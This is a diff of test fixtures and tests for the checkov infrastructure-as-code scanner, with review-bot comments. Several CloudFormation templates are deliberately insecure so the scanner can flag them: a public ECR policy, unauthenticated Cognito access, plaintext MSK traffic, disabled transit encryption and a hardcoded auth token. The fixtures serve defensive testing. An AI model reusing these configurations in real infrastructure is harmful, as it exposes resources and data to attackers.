@@ -1,55 +0,0 @@ -import pytest - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.circleci_pipelines.runner import Runner - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert not images - -@pytest.mark.parametrize( - "start_line, end_line, tag, supported_entities, old_key_format, expected_key", - [ - (21, - 22, - 'jobs', - ('jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_1[85:86]', - "jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)"), - (16, - 18, - 'executors', - ('executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_8[16:18]', - "executors(image-executor).docker.image[1](mongo:2.6.8)") - ] -) -def test_generate_resource_key_generates_same_key_as_get_resource(file_path, - start_line, end_line, tag, - supported_entities, - old_key_format, expected_key, - 
circleci_config_with_images_definitions): - definitions = circleci_config_with_images_definitions.get(file_path) - provider = CircleCIProvider(definitions, file_path) - runner = Runner() - runner.definitions[file_path] = definitions - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = provider.generate_resource_key(start_line, end_line, tag) - - assert key1 == key2 == expected_key diff --git a/tests/circleci_pipelines/image_referencer/test_runner.py b/tests/circleci_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 5b921f19e5a..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_runner.py +++ /dev/null 
@@ -1,68 +0,0 @@ -from pathlib import Path - -from checkov.circleci_pipelines.runner import Runner -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.common.bridgecrew.check_type import CheckType - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_empty_license_statuses_async, \ - mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources" - - -def test_circleCI_workflow(mocker: MockerFixture, file_path, image_cached_results_for_report): - from checkov.common.bridgecrew.platform_integration import bc_integration - test_file = RESOURCES_PATH / file_path - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_empty_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - circleci_report = next(report for report in reports if report.check_type == CheckType.CIRCLECI_PIPELINES) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(circleci_report.resources) == 0 - assert len(circleci_report.passed_checks) == 32 - assert len(circleci_report.failed_checks) == 13 - assert len(circleci_report.skipped_checks) == 0 - assert len(circleci_report.parsing_errors) == 0 - - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - got_images = ({ - 'image_name': image['dockerImageName'], - 'related_resource_id': image['relatedResourceId'], - 'packages': image['packages'] - } 
for image in sca_image_report.image_cached_results) - for image in got_images: - assert image in image_cached_results_for_report - assert len(sca_image_report.extra_resources) == 10 - assert len(sca_image_report.image_cached_results) == 10 - - -def test_runner_image_check(file_path): - test_file = RESOURCES_PATH / file_path - runner_filter = RunnerFilter(framework=['circleci_pipelines'], checks=['CKV_CIRCLECIPIPELINES_8']) - - report = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(report.failed_checks) == 0 - assert report.parsing_errors == [] - assert len(report.passed_checks) == 12 - assert report.skipped_checks ==[] diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml index afab03f3d83..855dfc01dad 100644 --- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml +++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMCredentialsExposure/FAILED.yml @@ -7,8 +7,12 @@ Resources: PolicyName: IAMUpdateAccessKeyPolicy PolicyDocument: Statement: - - Action: 'iam:UpdateAccessKey' - Effect: Allow + - Effect: Allow + Action: + - 'iam:UpdateAccessKey' + - 'iam:UntagRole' + - 'iam:CreateAccessKey' + - 'iam:TagPolicy' Resource: '*' Roles: - example_role diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml index 2f7f43783b9..ed97da1ff9a 100644 --- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml +++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_IAMPermissionsManagement/PASSED.yaml 
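Review bot: The rewritten statement drops the only coverage of the scalar form `Action: 'iam:UpdateAccessKey'`; after this change the FAILED fixture exercises just the list form, so a regression in how the check handles a bare-string Action would not be caught. Keeping a second statement in the scalar shape next to the new list, e.g. `- Effect: Allow`, `Action: 'iam:CreateAccessKey'`, `Resource: '*'`, would retain both shapes in one fixture. Mixing benign actions (iam:UntagRole, iam:TagPolicy) with credential-exposing ones is a useful addition, since it pins that a single exposing action in the list is enough to fail.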
@@ -3,6 +3,11 @@ Description: IAM policy Resources: NotPermissionsScoped: Type: 'AWS::IAM::Policy' + Metadata: + cfn-lint: + config: + ignore_checks: + - E3510 Properties: PolicyName: root PolicyDocument: @@ -12,7 +17,7 @@ Resources: Action: - 's3:Get*' Resource: - - 'foo' + - 'foobar' Roles: - example_role NotPermissionsWildcard: @@ -43,6 +48,11 @@ Resources: - example_role PermissionsScoped: Type: 'AWS::IAM::Policy' + Metadata: + cfn-lint: + config: + ignore_checks: + - E3510 Properties: PolicyName: root PolicyDocument: diff --git a/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml b/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml index a124927c875..301391cff7b 100644 --- a/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml +++ b/tests/cloudformation/checks/resource/aws/Cloudsplaining_ManagedPolicy/PASSED.yaml @@ -3,6 +3,11 @@ Description: IAM policy Resources: NotPermissionsScoped: Type: 'AWS::IAM::ManagedPolicy' + Metadata: + cfn-lint: + config: + ignore_checks: + - E3510 Properties: ManagedPolicyName: root PolicyDocument: @@ -43,6 +48,11 @@ Resources: - example_role PermissionsScoped: Type: 'AWS::IAM::ManagedPolicy' + Metadata: + cfn-lint: + config: + ignore_checks: + - E3510 Properties: ManagedPolicyName: root PolicyDocument: diff --git a/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml index ea98afa8533..5b8224cc663 100644 --- a/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_AuroraEncryption/AuroraEncryption-PASSED.yaml 
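Review bot: Both PASSED fixtures now suppress cfn-lint E3510 instead of supplying a Resource value the linter accepts; `foobar` (like `foo` before it) is not an ARN, so the PermissionsScoped case asserts the policy passes on input that could never deploy, and the presumption is that E3510 is objecting to exactly that. A realistic scoped ARN such as `- 'arn:aws:s3:::example-bucket/*'` would likely satisfy the linter without the Metadata override and would exercise the check against the shape real templates use. If the non-ARN value is deliberate, to show the check keys on action scoping rather than resource format, a one-line YAML comment above `ignore_checks:` saying so would stop the next reader from removing the suppression. The same applies to the ManagedPolicy fixture changed in this diff.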
@@ -1,7 +1,12 @@ Resources: Aurora0: Type: 'AWS::RDS::DBCluster' + Metadata: + cfn-lint: + config: + ignore_checks: + - E3690 Properties: - DatabaseName: 'mydb' + DatabaseName: 'mydb2' Engine: 'aurora' StorageEncrypted: true diff --git a/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml new file mode 100644 index 00000000000..a9c2eb6a58d --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/FAIL.yaml @@ -0,0 +1,6 @@ +AWSTemplateFormatVersion: "2010-09-09" +Resources: + Fail: + Type: AWS::Bedrock::Agent + Properties: + AgentName: test diff --git a/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml new file mode 100644 index 00000000000..e4dd99c02d9 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_BedrockAgentEncrypted/PASS.yaml @@ -0,0 +1,7 @@ +AWSTemplateFormatVersion: "2010-09-09" +Resources: + Pass: + Type: AWS::Bedrock::Agent + Properties: + AgentName: test + CustomerEncryptionKeyArn: arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml new file mode 100644 index 00000000000..8a5d5e8d9a8 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/FAILED.yml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Fail: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: True 
diff --git a/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml new file mode 100644 index 00000000000..b1fd73c9445 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_CognitoUnauthenticatedIdentities/PASSED.yaml @@ -0,0 +1,8 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: Identity pool +Resources: + Pass: + Type: AWS::Cognito::IdentityPool + Properties: + AllowClassicFlow: True + AllowUnauthenticatedIdentities: False diff --git a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml index f545330e862..5e4fd401443 100644 --- a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml +++ b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/example.yaml @@ -16,6 +16,7 @@ Resources: config: ignore_checks: - E2531 + - E2533 Properties: Handler: 'index.handler' Role: 'arn:aws:iam::123456789012:role/execution_role' diff --git a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml index 2ff19fbb789..c95da236954 100644 --- a/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml +++ b/tests/cloudformation/checks/resource/aws/example_DeprecatedLambdaRuntime/exampleSAM.yaml @@ -11,6 +11,7 @@ Resources: config: ignore_checks: - E2531 + - E2533 Properties: Handler: 'index.handler' Runtime: 'python3.6' diff --git a/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml index 6bac4483f69..e29d6cbc8eb 100644 
--- a/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_ECRPolicy/ECRPolicy-FAILED.yaml @@ -1,21 +1,20 @@ AWSTemplateFormatVersion: "2010-09-09" -Resources: +Resources: Public: Type: AWS::ECR::Repository - Properties: + Properties: RepositoryName: "test-repository" - RepositoryPolicyText: + RepositoryPolicyText: Version: "2012-10-17" - Statement: - - - Sid: AllowPushPull + Statement: + - Sid: AllowPushPull Effect: Allow - Principal: "*" - #Principal: - # AWS: - # - "arn:aws:iam::123456789012:user/Bob" - # - "arn:aws:iam::123456789012:user/Alice" - Action: + Principal: + AWS: + - "arn:aws:iam::123456789012:user/Bob" + - "arn:aws:iam::123456789012:user/Alice" + - "*" + Action: - "ecr:GetDownloadUrlForLayer" - "ecr:BatchGetImage" - "ecr:BatchCheckLayerAvailability" diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml index 848a622d6db..d946d9b07f9 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupFail: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AutomaticFailoverEnabled: !Ref MultiAZSupport 
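Review bot: The rewritten `Principal` block makes the failing case depend on `"*"` being the last entry of an `AWS` list that otherwise holds two account-scoped users, and nothing in the fixture says that this mixed form is the point of the change. A comment on that entry, e.g. `- "*"  # a wildcard anywhere in the AWS list still makes the repository policy public`, would keep the intent visible when the fixture is next edited. If the check's positive fixture only covers the bare `Principal: "*"` form, it is worth confirming that the list form is what the check is meant to catch; neither the check nor the PASSED fixture is visible from this hunk.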
@@ -131,16 +131,3 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml new file mode 100644 index 00000000000..be814c09922 --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-FAILED2.yaml 
@@ -0,0 +1,135 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. 
+ Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. 
In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupFail2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: False + UserGroupIds: + - Example diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml index 31137999bd5..55b459be5ab 100644 --- a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml 
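Review bot: In the new `ReplicationGroupFail2` resource the commented-out line `#TransitEncryptionEnabled: False` sits directly above the live `TransitEncryptionEnabled: False`, so the leftover now duplicates the active value and no longer documents an alternative; drop it (and the `#AtRestEncryptionEnabled: False # Optional parameter` line) so the property under test stands alone. The same leftover pair is copied into ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml. A short header comment naming what distinguishes this fixture from the existing FAILED file — as far as the two templates show, the `UserGroupIds` entry — would also help, since the remaining 130-odd lines are identical boilerplate.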
+++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED.yaml @@ -110,7 +110,7 @@ Resources: SubnetIds: - !Ref SubnetA - !Ref SubnetB - ReplicationGroup: + ReplicationGroupPass: Type: 'AWS::ElastiCache::ReplicationGroup' Properties: AuthToken: 'MySecret!AuthToken$' @@ -132,16 +132,4 @@ Resources: SnapshotWindow: !Ref SnapshotWindow #TransitEncryptionEnabled: False TransitEncryptionEnabled: True -Outputs: - RGEndpoint: - Description: The primary endpoint location - Value: !Join - - '' - - - 'redis://' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Address - - ':' - - !GetAtt - - ReplicationGroup - - PrimaryEndPoint.Port + diff --git a/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml new file mode 100644 index 00000000000..0c71e1fecbc --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/ElasticacheReplicationGroupEncryptionAtTransitAuthToken-PASSED2.yaml 
@@ -0,0 +1,136 @@ +AWSTemplateFormatVersion: 2010-09-09 +Description: >- + An example template that stands up an ElastiCache Replication Group Multi-AZ in a particular VPC specifying then a Subnet Group and a Security Group, VpcId is not directly referenced by the Replication Group resource, and is instead inferred by the Security Group and Subnet Group. +Parameters: + CacheNodeType: + Description: The instance type the nodes will launch under. + Type: String + Default: cache.m3.medium + AllowedValues: + - cache.t2.micro + - cache.t2.small + - cache.t2.medium + - cache.m3.medium + - cache.m3.large + - cache.m3.xlarge + - cache.m3.2xlarge + - cache.r3.large + - cache.r3.xlarge + - cache.r3.2xlarge + - cache.r3.4xlarge + - cache.r3.8xlarge + MultiAZSupport: + Description: >- + Indicates whether Multi-AZ is enabled. When Multi-AZ is enabled, a + read-only replica is automatically promoted to a read-write primary + cluster if the existing primary cluster fails. If you specify true, you must specify a value greater than 1 for the NumCacheClusters property. + Type: String + Default: 'true' + AllowedValues: + - 'true' + - 'false' + NumCacheClusters: + Description: >- + The number of cache clusters for this replication group. If MultiAZ + support is enabled, you must specify a value greater than 1. + Default: '2' + Type: Number + MinValue: '1' + MaxValue: '6' + RedisPort: + Description: >- + The port number on which each member of the replication group accepts + connections. + Type: Number + Default: '6379' + MinValue: '1' + MaxValue: '65535' + ReplicationGroupDescription: + Description: The description of the replication group. 
+ Type: String + Default: Example replication group + VpcId: + Description: The VPC to create this ReplicationGroup under + Type: 'AWS::EC2::VPC::Id' + CidrIp: + Description: The CIDR you want to access to the Replication Group + Type: String + Default: 0.0.0.0/0 + AllowedPattern: '(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})/(\d{1,2})' + MinLength: '9' + MaxLength: '18' + ConstraintDescription: must be a valid IP CIDR range of the form x.x.x.x/x + SnapshotRetentionLimit: + Description: >- + The number of days that ElastiCache retains automatic snapshots before + deleting them. + Type: Number + Default: '7' + SnapshotWindow: + Description: >- + The time range (in UTC) when ElastiCache takes a daily snapshot of your node group. + Type: String + Default: '05:00-09:00' + AllowedPattern: '\d{2}:\d{2}-\d{2}:\d{2}' + ConstraintDescription: 'must be a valid timestamp range, for example 05:00-09:00' + PreferredMaintenanceWindow: + Description: >- + The weekly time range during which system maintenance can occur. Use the following format to specify a time range: ddd:hh24:mi-ddd:hh24:mi (24H Clock UTC). + Type: String + Default: 'sun:22:00-sun:23:30' + AllowedPattern: >- + (mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2}-(mon|tue|wed|thu|fri|sat|sun):\d{2}:\d{2} + ConstraintDescription: >- + must be a valid timestamp range with day of week, for example + sun:22:00-sun:23:30 + SubnetA: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' + SubnetB: + Description: >- + One of the subnets you would like the ReplicationGroup to be created in. 
In this example we only accept 2 subnets + Type: 'AWS::EC2::Subnet::Id' +Resources: + SecurityGroup: + Type: 'AWS::EC2::SecurityGroup' + Properties: + GroupDescription: Security Group for Example Replication Group + SecurityGroupIngress: + - Description: Redis Traffic + CidrIp: !Ref CidrIp + FromPort: !Ref RedisPort + ToPort: !Ref RedisPort + IpProtocol: tcp + VpcId: !Ref VpcId + SubnetGroup: + Type: 'AWS::ElastiCache::SubnetGroup' + Properties: + Description: Subnet Group for Example Replication Group + SubnetIds: + - !Ref SubnetA + - !Ref SubnetB + ReplicationGroupPass2: + Type: 'AWS::ElastiCache::ReplicationGroup' + Properties: + AutomaticFailoverEnabled: !Ref MultiAZSupport + AtRestEncryptionEnabled: True + #AtRestEncryptionEnabled: False # Optional parameter + CacheNodeType: !Ref CacheNodeType + CacheSubnetGroupName: !Ref SubnetGroup + Engine: redis + NumCacheClusters: !Ref NumCacheClusters + Port: !Ref RedisPort + PreferredMaintenanceWindow: !Ref PreferredMaintenanceWindow + ReplicationGroupDescription: !Ref ReplicationGroupDescription + SecurityGroupIds: + - !GetAtt + - SecurityGroup + - GroupId + SnapshotRetentionLimit: !Ref SnapshotRetentionLimit + SnapshotWindow: !Ref SnapshotWindow + #TransitEncryptionEnabled: False + TransitEncryptionEnabled: True + UserGroupIds: + - Example + diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml new file mode 100644 index 00000000000..75c5715222c --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-FAIL.yaml 
@@ -0,0 +1,67 @@ +Resources: + MSKClusterFAILskip: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" + MSKClusterFAILnotTLS: + Type: "AWS::MSK::Cluster" + Properties: + ClusterName: "bad" + KafkaVersion: "3.2.0" + NumberOfBrokerNodes: 2 + BrokerNodeGroupInfo: + StorageInfo: + EBSStorageInfo: + VolumeSize: 1100 + ClientSubnets: + - "subnet-0562ef1d304b968f4" + - "subnet-08895dbf9e060579b" + InstanceType: "kafka.t3.small" + SecurityGroups: + - "sg-002ed1a53dc5fe0ad" + ConnectivityInfo: + PublicAccess: + Type: "SERVICE_PROVIDED_EIPS" + ConfigurationInfo: + Arn: "" + Revision: 0 + EncryptionInfo: + EncryptionAtRest: + DataVolumeKMSKeyId: "arn:aws:kms:eu-west-2:680235478471:key/fd160011-126e-4bec-b370-c8765b5c6a37" + EncryptionInTransit: + ClientBroker: "PLAINTEXT" + InCluster: true + OpenMonitoring: + Prometheus: + JmxExporter: + EnabledInBroker: false + NodeExporter: + EnabledInBroker: false + Tags: + pike: "permissions" diff --git a/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml new file mode 100644 index 00000000000..76f6d776abb --- /dev/null +++ b/tests/cloudformation/checks/resource/aws/example_MSKClusterEncryption/MSKClusterEncryption-PASS.yaml 
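Review bot: The new MSK fixtures embed what look like concrete identifiers — the KMS key ARN under account `680235478471`, subnet ids `subnet-0562ef1d304b968f4`/`subnet-08895dbf9e060579b` and security group `sg-002ed1a53dc5fe0ad` — whereas the other fixtures in this commit use the documented example accounts (`123456789012`, `111122223333`) and plain placeholders. If these were copied from a real environment, replacing them with placeholder values avoids publishing resource identifiers that serve no purpose in the test; the same values recur in MSKClusterEncryption-PASS.yaml, MSKClusterLogging/MSKClusterNodesArePrivate-FAIL.yaml and both example_MSKClusterNodesArePrivate files. Separately, the resource name `MSKClusterFAILskip` in a FAIL fixture does not say whether a cluster with no `EncryptionInfo` block is expected to fail or to be skipped; a comment such as `# no EncryptionInfo at all: expected result <FAIL or SKIP — confirm against the check>` would settle that.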
